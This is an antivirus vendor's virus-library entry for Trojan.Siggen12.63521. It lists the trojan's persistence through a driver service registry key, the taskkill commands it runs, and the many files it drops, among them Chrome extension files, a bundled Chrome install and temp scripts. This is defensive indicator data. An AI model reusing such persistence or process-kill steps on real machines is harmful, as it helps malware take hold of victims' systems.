ユーザー向け情報

閉じる

マイライブラリ
マイライブラリ

+ マイライブラリに追加

検索
検索

電話
テクニカルサポート利用方法

問い合わせ

新規お問い合わせ

電話

03-6550-8770

フォーラム(英語)

お問い合わせ履歴

新規お問い合わせ

電話

03-6550-8770

Profile

JP

RU CN DE EN ES FR IT JP KZ UZ PL BY ID
閉じる
サービス
スキャナー
Dr.Web vxCube
トライアル
ウイルスライブラリ
ナレッジベース

テクノロジー

用語

トレーニングコースおよび啓蒙プロジェクト

アンチウイルスに関する誤解と噂

ニュース

Trojan.Siggen12.63521

Added to the Dr.Web virus database: 2021-03-31

Virus description added:

Technical Information

To ensure autorun and distribution
Sets the following service settings
  • [<HKLM>\System\CurrentControlSet\Services\SNAPSHOD0] 'ImagePath' = '<DRIVERS>\SNAPSHOD0.sys'
Creates the following services
  • 'SNAPSHOD0' <DRIVERS>\SNAPSHOD0.sys
Malicious functions
Executes the following
  • '%WINDIR%\syswow64\taskkill.exe' /im "<File name>.exe" /F
  • '%WINDIR%\syswow64\taskkill.exe' /im SnapShot.Exe /F
Modifies file system
Creates the following files
  • %TEMP%\компактная skype.txt
  • u:\chrome\userdata\default\extensions\mkhnbhdofgaendegcgbmndipmijhbili\1.8.5_0\assets\img\icon128.png
  • u:\chrome\userdata\default\extensions\mkhnbhdofgaendegcgbmndipmijhbili\1.8.5_0\assets\img\icon.png
  • u:\chrome\userdata\default\extensions\mkhnbhdofgaendegcgbmndipmijhbili\1.8.5_0\assets\img\error.png
  • u:\chrome\userdata\default\extensions\mkhnbhdofgaendegcgbmndipmijhbili\1.8.5_0\assets\css\options.css
  • u:\chrome\userdata\default\extensions\mjiegoobnbffbijofakannnicbccjcme\1.0.10_0\_metadata\verified_contents.json
  • u:\chrome\userdata\default\extensions\mjiegoobnbffbijofakannnicbccjcme\1.0.10_0\_locales\ja\messages.json
  • u:\chrome\userdata\default\extensions\mjiegoobnbffbijofakannnicbccjcme\1.0.10_0\_locales\en\messages.json
  • u:\chrome\userdata\default\extensions\mjiegoobnbffbijofakannnicbccjcme\1.0.10_0\options.js
  • u:\chrome\userdata\default\extensions\mjiegoobnbffbijofakannnicbccjcme\1.0.10_0\options.html
  • u:\chrome\userdata\default\extensions\mjiegoobnbffbijofakannnicbccjcme\1.0.10_0\options.css
  • u:\chrome\userdata\default\extensions\mjiegoobnbffbijofakannnicbccjcme\1.0.10_0\manifest.json
  • u:\chrome\userdata\default\extensions\mjiegoobnbffbijofakannnicbccjcme\1.0.10_0\jquery-2.0.3.min.js
  • u:\chrome\userdata\default\extensions\mjiegoobnbffbijofakannnicbccjcme\1.0.10_0\img\spoofs_ua48.png
  • u:\chrome\userdata\default\extensions\mjiegoobnbffbijofakannnicbccjcme\1.0.10_0\img\spoofs_ua38.png
  • u:\chrome\userdata\default\extensions\mjiegoobnbffbijofakannnicbccjcme\1.0.10_0\img\spoofs_ua19.png
  • u:\chrome\userdata\default\extensions\mjiegoobnbffbijofakannnicbccjcme\1.0.10_0\img\spoofs_ua128.png
  • u:\chrome\userdata\default\extensions\mjiegoobnbffbijofakannnicbccjcme\1.0.10_0\background.js
  • u:\chrome\userdata\default\extensions\jjmflmamggggndanpgfnpelongoepncg\1.4.0_0\_metadata\verified_contents.json
  • u:\chrome\userdata\default\extensions\jjmflmamggggndanpgfnpelongoepncg\1.4.0_0\_metadata\computed_hashes.json
  • u:\chrome\userdata\default\extensions\jjmflmamggggndanpgfnpelongoepncg\1.4.0_0\styles\normalize.css
  • u:\chrome\userdata\default\extensions\jjmflmamggggndanpgfnpelongoepncg\1.4.0_0\styles\options.css
  • u:\chrome\userdata\default\extensions\mkhnbhdofgaendegcgbmndipmijhbili\1.8.5_0\assets\img\icon16.png
  • u:\chrome\userdata\default\extensions\mkhnbhdofgaendegcgbmndipmijhbili\1.8.5_0\assets\img\icon48.png
  • u:\chrome\userdata\default\extensions\nhahncknpppipmgjchbbhehkfglelepf\5.0.21_0\searchhighlight.js
  • u:\chrome\userdata\default\extensions\nhahncknpppipmgjchbbhehkfglelepf\5.0.21_0\searchhighlight.css
  • u:\chrome\userdata\default\extensions\nhahncknpppipmgjchbbhehkfglelepf\5.0.21_0\manifest.json
  • u:\chrome\userdata\default\extensions\nhahncknpppipmgjchbbhehkfglelepf\5.0.21_0\jquery\jquery-1.12.4.min.js
  • u:\chrome\userdata\default\extensions\nhahncknpppipmgjchbbhehkfglelepf\5.0.21_0\icons\highlight48.png
  • u:\chrome\userdata\default\extensions\nhahncknpppipmgjchbbhehkfglelepf\5.0.21_0\icons\highlight16.png
  • u:\chrome\userdata\default\extensions\nhahncknpppipmgjchbbhehkfglelepf\5.0.21_0\icons\highlight128.png
  • u:\chrome\userdata\default\extensions\nhahncknpppipmgjchbbhehkfglelepf\5.0.21_0\icon.png
  • u:\chrome\userdata\default\extensions\nhahncknpppipmgjchbbhehkfglelepf\5.0.21_0\background.js
  • u:\chrome\userdata\default\extensions\mkhnbhdofgaendegcgbmndipmijhbili\1.8.5_0\_locales\ru\messages.json
  • u:\chrome\userdata\default\extensions\jjmflmamggggndanpgfnpelongoepncg\1.4.0_0\styles\font-awesome.min.css
  • u:\chrome\userdata\default\extensions\mkhnbhdofgaendegcgbmndipmijhbili\1.8.5_0\_locales\en\messages.json
  • u:\chrome\userdata\default\extensions\mkhnbhdofgaendegcgbmndipmijhbili\1.8.5_0\options.html
  • u:\chrome\userdata\default\extensions\mkhnbhdofgaendegcgbmndipmijhbili\1.8.5_0\manifest.json
  • u:\chrome\userdata\default\extensions\mkhnbhdofgaendegcgbmndipmijhbili\1.8.5_0\assets\js\punycode.js
  • u:\chrome\userdata\default\extensions\mkhnbhdofgaendegcgbmndipmijhbili\1.8.5_0\assets\js\options.js
  • u:\chrome\userdata\default\extensions\mkhnbhdofgaendegcgbmndipmijhbili\1.8.5_0\assets\js\content.js
  • u:\chrome\userdata\default\extensions\mkhnbhdofgaendegcgbmndipmijhbili\1.8.5_0\assets\js\background.js
  • u:\chrome\userdata\default\extensions\mkhnbhdofgaendegcgbmndipmijhbili\1.8.5_0\assets\img\success.png
  • u:\chrome\userdata\default\extensions\mkhnbhdofgaendegcgbmndipmijhbili\1.8.5_0\assets\img\notify.png
  • u:\chrome\userdata\default\extensions\jjmflmamggggndanpgfnpelongoepncg\1.4.0_0\styles\index.css
  • u:\chrome\userdata\default\extensions\jjmflmamggggndanpgfnpelongoepncg\1.4.0_0\profiles.html
  • u:\chrome\userdata\default\extensions\nhahncknpppipmgjchbbhehkfglelepf\5.0.21_0\_locales\ru\messages.json
  • u:\chrome\userdata\default\extensions\hjjlnpghgkgmnpjimgbblhggmbjlbmld\1.3.0.0_0\settings.html
  • u:\chrome\userdata\default\extensions\hjjlnpghgkgmnpjimgbblhggmbjlbmld\1.3.0.0_0\purple.png
  • u:\chrome\userdata\default\extensions\hjjlnpghgkgmnpjimgbblhggmbjlbmld\1.3.0.0_0\manifest.json
  • u:\chrome\userdata\default\extensions\hjjlnpghgkgmnpjimgbblhggmbjlbmld\1.3.0.0_0\loader.gif
  • u:\chrome\userdata\default\extensions\hjjlnpghgkgmnpjimgbblhggmbjlbmld\1.3.0.0_0\icon.png
  • u:\chrome\userdata\default\extensions\hjjlnpghgkgmnpjimgbblhggmbjlbmld\1.3.0.0_0\icon-48.png
  • u:\chrome\userdata\default\extensions\hjjlnpghgkgmnpjimgbblhggmbjlbmld\1.3.0.0_0\icon-128.png
  • u:\chrome\userdata\default\extensions\hjjlnpghgkgmnpjimgbblhggmbjlbmld\1.3.0.0_0\green.png
  • u:\chrome\userdata\default\extensions\hjjlnpghgkgmnpjimgbblhggmbjlbmld\1.3.0.0_0\beige.png
  • u:\chrome\userdata\default\extensions\eonffnnfmbfnmjpaiigdclmfelolemah\1.4_0\_metadata\verified_contents.json
  • u:\chrome\userdata\default\extensions\eonffnnfmbfnmjpaiigdclmfelolemah\1.4_0\_locales\uk\messages.json
  • u:\chrome\userdata\default\extensions\eonffnnfmbfnmjpaiigdclmfelolemah\1.4_0\_locales\ru\messages.json
  • u:\chrome\userdata\default\extensions\eonffnnfmbfnmjpaiigdclmfelolemah\1.4_0\_locales\fr\messages.json
  • u:\chrome\userdata\default\extensions\eonffnnfmbfnmjpaiigdclmfelolemah\1.4_0\_locales\en\messages.json
  • u:\chrome\userdata\default\extensions\eonffnnfmbfnmjpaiigdclmfelolemah\1.4_0\_locales\de\messages.json
  • u:\chrome\userdata\default\extensions\eonffnnfmbfnmjpaiigdclmfelolemah\1.4_0\_locales\by\messages.json
  • u:\chrome\userdata\default\extensions\eonffnnfmbfnmjpaiigdclmfelolemah\1.4_0\scripts\popup.js
  • u:\chrome\userdata\default\extensions\eonffnnfmbfnmjpaiigdclmfelolemah\1.4_0\scripts\background.js
  • u:\chrome\userdata\default\extensions\eonffnnfmbfnmjpaiigdclmfelolemah\1.4_0\popup.html
  • u:\chrome\userdata\default\extensions\hjjlnpghgkgmnpjimgbblhggmbjlbmld\1.3.0.0_0\settings.js
  • u:\chrome\userdata\default\extensions\hjjlnpghgkgmnpjimgbblhggmbjlbmld\1.3.0.0_0\start.js
  • u:\chrome\userdata\default\extensions\jjmflmamggggndanpgfnpelongoepncg\1.4.0_0\options.html
  • u:\chrome\userdata\default\extensions\jjmflmamggggndanpgfnpelongoepncg\1.4.0_0\js\index.js
  • u:\chrome\userdata\default\extensions\jjmflmamggggndanpgfnpelongoepncg\1.4.0_0\js\libs\jquery.min.js
  • u:\chrome\userdata\default\extensions\jjmflmamggggndanpgfnpelongoepncg\1.4.0_0\manifest.json
  • u:\chrome\userdata\default\extensions\jjmflmamggggndanpgfnpelongoepncg\1.4.0_0\js\profiles.js
  • u:\chrome\userdata\default\extensions\jjmflmamggggndanpgfnpelongoepncg\1.4.0_0\js\options.js
  • u:\chrome\userdata\default\extensions\jjmflmamggggndanpgfnpelongoepncg\1.4.0_0\js\migration.js
  • u:\chrome\userdata\default\extensions\jjmflmamggggndanpgfnpelongoepncg\1.4.0_0\js\libs\underscore.string.min.js
  • u:\chrome\userdata\default\extensions\jjmflmamggggndanpgfnpelongoepncg\1.4.0_0\js\libs\underscore-min.js
  • u:\chrome\userdata\default\extensions\jjmflmamggggndanpgfnpelongoepncg\1.4.0_0\js\libs\knockout-secure-binding.min.js
  • u:\chrome\userdata\default\extensions\jjmflmamggggndanpgfnpelongoepncg\1.4.0_0\js\libs\knockout-3.4.0.js
  • u:\chrome\userdata\default\extensions\mkhnbhdofgaendegcgbmndipmijhbili\1.8.5_0\_metadata\verified_contents.json
  • u:\chrome\userdata\default\extensions\nhahncknpppipmgjchbbhehkfglelepf\5.0.21_0\un_icon.png
  • u:\chrome\userdata\default\extensions\hjjlnpghgkgmnpjimgbblhggmbjlbmld\1.3.0.0_0\red.png
  • u:\chrome\userdata\default\extensions\jjmflmamggggndanpgfnpelongoepncg\1.4.0_0\index.html
  • u:\chrome\userdata\default\extensions\jjmflmamggggndanpgfnpelongoepncg\1.4.0_0\images\iconbar.png
  • u:\chrome\userdata\default\extensions\jjmflmamggggndanpgfnpelongoepncg\1.4.0_0\images\icon48.png
  • u:\chrome\userdata\default\extensions\jjmflmamggggndanpgfnpelongoepncg\1.4.0_0\images\icon16.png
  • u:\chrome\userdata\default\extensions\jjmflmamggggndanpgfnpelongoepncg\1.4.0_0\images\icon128.png
  • u:\chrome\userdata\default\extensions\jjmflmamggggndanpgfnpelongoepncg\1.4.0_0\fonts\fontawesome-webfont.woff2
  • u:\chrome\userdata\default\extensions\hjjlnpghgkgmnpjimgbblhggmbjlbmld\1.3.0.0_0\_metadata\verified_contents.json
  • u:\chrome\userdata\default\extensions\hjjlnpghgkgmnpjimgbblhggmbjlbmld\1.3.0.0_0\_metadata\computed_hashes.json
  • u:\chrome\userdata\default\extensions\jjmflmamggggndanpgfnpelongoepncg\1.4.0_0\js\engine.js
  • u:\chrome\userdata\default\extensions\dmpojjilddefgnhiicjcmhbkjgbbclob\1.8.6_0\img\icon_18.png
  • u:\chrome\userdata\default\extensions\nhahncknpppipmgjchbbhehkfglelepf\5.0.21_0\_metadata\verified_contents.json
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\js\options\options.js
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\js\message\message.js
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\js\libs\md5.js
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\js\libs\library.js
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\js\libs\dom.js
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\js\libs\browser.js
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\js\content\disable.js
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\js\content\content.js
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\js\constants.js
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\js\background\tabs.js
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\js\background\sites.js
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\js\background\settings.js
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\js\background\selectors.js
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\js\background\handler.js
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\js\background\exclusion.js
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\js\background\domains.js
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\js\background\config.js
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\js\background\blocklist.js
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\js\background\background.js
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\js\popup\popup.js
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\js\report\report.js
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\manifest.json
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\templates\dlgblock.css
  • C:\chrome\master_preferences
  • u:\chrome\userdata\default\bookmarks
  • u:\chrome\userdata\local state
  • u:\chrome\userdata\default\local storage\chrome-extension_hjjlnpghgkgmnpjimgbblhggmbjlbmld_0.localstorage
  • u:\chrome\userdata\default\local extension settings\ofomgafpojcdabieomlaghjnhnpiaeap\000003.log
  • u:\chrome\userdata\default\local extension settings\mjiegoobnbffbijofakannnicbccjcme\000003.log
  • u:\chrome\userdata\default\local extension settings\dmpojjilddefgnhiicjcmhbkjgbbclob\000001.log
  • u:\chrome\userdata\default\local extension settings\aleakchihdccplidncghkekgioiakgal\000003.log
  • u:\chrome\userdata\default\local extension settings\agdpdlplhmfgonalmdooaojempaoncmp\000003.log
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\images\wait.gif
  • u:\chrome\userdata\default\extensions\eonffnnfmbfnmjpaiigdclmfelolemah\1.4_0\manifest.json
  • u:\chrome\userdata\default\extensions\pihmbjnaeenimjokcejnenhppigofjdi\5.1_0\toggle.js
  • u:\chrome\userdata\default\extensions\pihmbjnaeenimjokcejnenhppigofjdi\5.1_0\select_text.js
  • u:\chrome\userdata\default\extensions\pihmbjnaeenimjokcejnenhppigofjdi\5.1_0\manifest.json
  • u:\chrome\userdata\default\extensions\pihmbjnaeenimjokcejnenhppigofjdi\5.1_0\jquery.js
  • u:\chrome\userdata\default\extensions\pihmbjnaeenimjokcejnenhppigofjdi\5.1_0\icon_128.png
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\_metadata\verified_contents.json
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\_locales\ru\messages.json
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\_locales\en\messages.json
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\templates\dlgblock.html
  • u:\chrome\userdata\default\extensions\pihmbjnaeenimjokcejnenhppigofjdi\5.1_0\_metadata\computed_hashes.json
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\images\social_vk.png
  • u:\chrome\userdata\default\extensions\hjjlnpghgkgmnpjimgbblhggmbjlbmld\1.3.0.0_0\settings.css
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\images\social_fb.png
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\images\icon-48.png
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\html\background.html
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\css\report.css
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\css\popup.css
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\css\options.css
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\css\message.css
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\css\content.css
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\css\about.css
  • u:\chrome\userdata\default\extensions\oficfgdfeoknbjfhommlpiekdapmnebh\0.3_0\_metadata\verified_contents.json
  • u:\chrome\userdata\default\extensions\oficfgdfeoknbjfhommlpiekdapmnebh\0.3_0\manifest.json
  • u:\chrome\userdata\default\extensions\oficfgdfeoknbjfhommlpiekdapmnebh\0.3_0\logo-32.png
  • u:\chrome\userdata\default\extensions\oficfgdfeoknbjfhommlpiekdapmnebh\0.3_0\icon48.png
  • u:\chrome\userdata\default\extensions\oficfgdfeoknbjfhommlpiekdapmnebh\0.3_0\icon128.png
  • u:\chrome\userdata\default\extensions\oficfgdfeoknbjfhommlpiekdapmnebh\0.3_0\background.js
  • u:\chrome\userdata\default\extensions\oficfgdfeoknbjfhommlpiekdapmnebh\0.3_0\background.html
  • u:\chrome\userdata\default\extensions\nldmhfnlbkkdhboedalogjpeedjbmjgi\0.1_0\_metadata\verified_contents.json
  • u:\chrome\userdata\default\extensions\nldmhfnlbkkdhboedalogjpeedjbmjgi\0.1_0\_metadata\computed_hashes.json
  • u:\chrome\userdata\default\extensions\nldmhfnlbkkdhboedalogjpeedjbmjgi\0.1_0\manifest.json
  • u:\chrome\userdata\default\extensions\nldmhfnlbkkdhboedalogjpeedjbmjgi\0.1_0\icon.png
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\html\options.html
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\html\popup.html
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\html\report.html
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\images\aim.png
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\images\share_vk.png
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\images\share_twitter.png
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\images\share_facebook.png
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\images\settings-128.png
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\images\save.png
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\images\opt.png
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\images\off_ext-38.png
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\images\off_ext-19.png
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\images\logo.png
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\images\social_twitter.png
  • u:\chrome\userdata\default\extensions\nldmhfnlbkkdhboedalogjpeedjbmjgi\0.1_0\background.html
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\images\icon-19.png
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\images\icon-16.png
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\images\icon-128.png
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\images\delete.png
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\images\container_logo.png
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\images\close.png
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\images\bad_ext-38.png
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\images\bad_ext-19.png
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\images\arrow.png
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\images\icon-38.png
  • u:\chrome\userdata\default\extensions\ohmkcnojelglgphmkgmofjlmpoelccjh\2.18.1.0_0\html\message.html
  • u:\chrome\userdata\default\extensions\eonffnnfmbfnmjpaiigdclmfelolemah\1.4_0\images\scrollbar-up.gif
  • u:\chrome\userdata\default\extensions\eonffnnfmbfnmjpaiigdclmfelolemah\1.4_0\images\scrollbar-up-active.gif
  • u:\chrome\userdata\default\extensions\eonffnnfmbfnmjpaiigdclmfelolemah\1.4_0\images\scrollbar-handle.gif
  • C:\chrome\76.0.3809.100\swiftshader\libglesv2.dll
  • C:\chrome\76.0.3809.100\nacl64.exe
  • C:\chrome\76.0.3809.100\libglesv2.dll
  • C:\chrome\76.0.3809.100\libegl.dll
  • C:\chrome\76.0.3809.100\eventlog_provider.dll
  • C:\chrome\76.0.3809.100\elevation_service.exe
  • C:\chrome\76.0.3809.100\d3dcompiler_47.dll
  • C:\chrome\76.0.3809.100\chrome_watcher.dll
  • C:\chrome\76.0.3809.100\chrome_elf.dll
  • C:\chrome\76.0.3809.100\chrome_child.dll
  • C:\chrome\76.0.3809.100\chrome.dll
  • C:\chrome\76.0.3809.100\widevinecdm\_platform_specific\win_x86\widevinecdm.dll.sig
  • C:\chrome\76.0.3809.100\widevinecdm\manifest.json
  • C:\chrome\76.0.3809.100\widevinecdm\license
  • C:\chrome\76.0.3809.100\visualelements\smalllogodev.png
  • C:\chrome\76.0.3809.100\visualelements\smalllogocanary.png
  • C:\chrome\76.0.3809.100\visualelements\smalllogobeta.png
  • C:\chrome\76.0.3809.100\visualelements\smalllogo.png
  • C:\chrome\76.0.3809.100\visualelements\logodev.png
  • C:\chrome\76.0.3809.100\widevinecdm\_platform_specific\win_x86\widevinecdm.dll
  • C:\chrome\7z.exe
  • u:\chrome\userdata\default\extensions\aapbdbdomjkkjkaonfhkkikfgjllcleb\2.0.7_0\main_compiled.js
  • u:\chrome\userdata\default\extensions\aapbdbdomjkkjkaonfhkkikfgjllcleb\2.0.7_0\bubble_gss.css
  • u:\chrome\userdata\default\extensions\aapbdbdomjkkjkaonfhkkikfgjllcleb\2.0.7_0\icons\128.png
  • u:\chrome\userdata\default\extensions\aapbdbdomjkkjkaonfhkkikfgjllcleb\2.0.7_0\injection.js
  • u:\chrome\userdata\default\extensions\aapbdbdomjkkjkaonfhkkikfgjllcleb\2.0.7_0\icons\new_translation.png
  • u:\chrome\userdata\default\extensions\aapbdbdomjkkjkaonfhkkikfgjllcleb\2.0.7_0\icons\audio.png
  • u:\chrome\userdata\default\extensions\aapbdbdomjkkjkaonfhkkikfgjllcleb\2.0.7_0\icons\48.png
  • u:\chrome\userdata\default\extensions\aapbdbdomjkkjkaonfhkkikfgjllcleb\2.0.7_0\icons\38.png
  • u:\chrome\userdata\default\extensions\aapbdbdomjkkjkaonfhkkikfgjllcleb\2.0.7_0\icons\32.png
  • u:\chrome\userdata\default\extensions\aapbdbdomjkkjkaonfhkkikfgjllcleb\2.0.7_0\icons\19.png
  • u:\chrome\userdata\default\extensions\aapbdbdomjkkjkaonfhkkikfgjllcleb\2.0.7_0\icons\16.png
  • C:\chrome\76.0.3809.100\swiftshader\libegl.dll
  • C:\chrome\76.0.3809.100\visualelements\logocanary.png
  • C:\chrome\76.0.3809.100\default_apps\external_extensions.json
  • u:\chrome\master_preferences_zoom-100%
  • u:\chrome\master_preferences
  • u:\chrome\76.0.3809.100\default_apps\youtube.crx
  • u:\chrome\76.0.3809.100\default_apps\gmail.crx
  • u:\chrome\76.0.3809.100\default_apps\external_extensions.json
  • u:\chrome\76.0.3809.100\default_apps\drive.crx
  • u:\chrome\76.0.3809.100\default_apps\docs.crx
  • C:\chrome\chrome.exe
  • u:\chrome\userdata\default\extensions\aapbdbdomjkkjkaonfhkkikfgjllcleb\2.0.7_0\bubble_compiled.js
  • u:\chrome\userdata\crashpad\settings.dat
  • u:\chrome\userdata\default\extensions\aapbdbdomjkkjkaonfhkkikfgjllcleb\2.0.7_0\manifest.json
  • C:\chrome\76.0.3809.100\v8_context_snapshot.bin
  • %TEMP%\7chrome.#
  • %TEMP%\6chrome.#
  • %TEMP%\2chrome.#
  • %TEMP%\5chrome.#
  • %TEMP%\3chrome.#
  • %TEMP%\1chrome.#
  • %TEMP%\0chrome.#
  • %WINDIR%\temp\udda2c4.tmp
  • <DRIVERS>\snapshod0.sys
  • %TEMP%\wg.bat
  • %TEMP%\rd.sna
  • %TEMP%\2mvpt9fx1
  • nul
  • %TEMP%\wz.bat
  • %TEMP%\ok.js
  • %TEMP%\wget.exe
  • %TEMP%\chrome76.bat
  • %TEMP%\облачные программы.txt
  • %TEMP%\4wvhh5s1u
  • %TEMP%\conf1chrome
  • %TEMP%\4chrome.#
  • %TEMP%\conf2chrome
  • C:\chrome\76.0.3809.100\resources.pak
  • %TEMP%\0chrome.exe
  • C:\chrome\76.0.3809.100\natives_blob.bin
  • C:\chrome\76.0.3809.100\nacl_irt_x86_64.nexe
  • C:\chrome\76.0.3809.100\nacl_irt_x86_32.nexe
  • C:\chrome\76.0.3809.100\meipreload\preloaded_data.pb
  • C:\chrome\76.0.3809.100\meipreload\manifest.json
  • C:\chrome\76.0.3809.100\locales\ru.pak
  • C:\chrome\76.0.3809.100\icudtl.dat
  • C:\chrome\76.0.3809.100\default_apps\youtube.crx
  • C:\chrome\76.0.3809.100\visualelements\logobeta.png
  • C:\chrome\76.0.3809.100\visualelements\logo.png
  • C:\chrome\76.0.3809.100\default_apps\drive.crx
  • C:\chrome\76.0.3809.100\default_apps\docs.crx
  • C:\chrome\76.0.3809.100\chrome_child.dll.sig
  • C:\chrome\76.0.3809.100\chrome_200_percent.pak
  • C:\chrome\76.0.3809.100\chrome_100_percent.pak
  • C:\chrome\76.0.3809.100\chrome.exe.sig
  • C:\chrome\76.0.3809.100\chrome.dll.sig
  • C:\chrome\76.0.3809.100\76.0.3809.100.manifest
  • %TEMP%\123chrome.exe
  • C:\chrome\76.0.3809.100\default_apps\gmail.crx
  • u:\chrome\userdata\default\extensions\pihmbjnaeenimjokcejnenhppigofjdi\5.1_0\_metadata\verified_contents.json
  • u:\chrome\userdata\default\extensions\aapbdbdomjkkjkaonfhkkikfgjllcleb\2.0.7_0\options.html
  • u:\chrome\userdata\default\extensions\aapbdbdomjkkjkaonfhkkikfgjllcleb\2.0.7_0\popup.html
  • u:\chrome\userdata\default\extensions\ednnkpljcbpjcoplcooifiblghkephlh\1.12.0_0\icons\icon.48.png
  • u:\chrome\userdata\default\extensions\ednnkpljcbpjcoplcooifiblghkephlh\1.12.0_0\icons\icon.16.png
  • u:\chrome\userdata\default\extensions\ednnkpljcbpjcoplcooifiblghkephlh\1.12.0_0\icons\icon.128.png
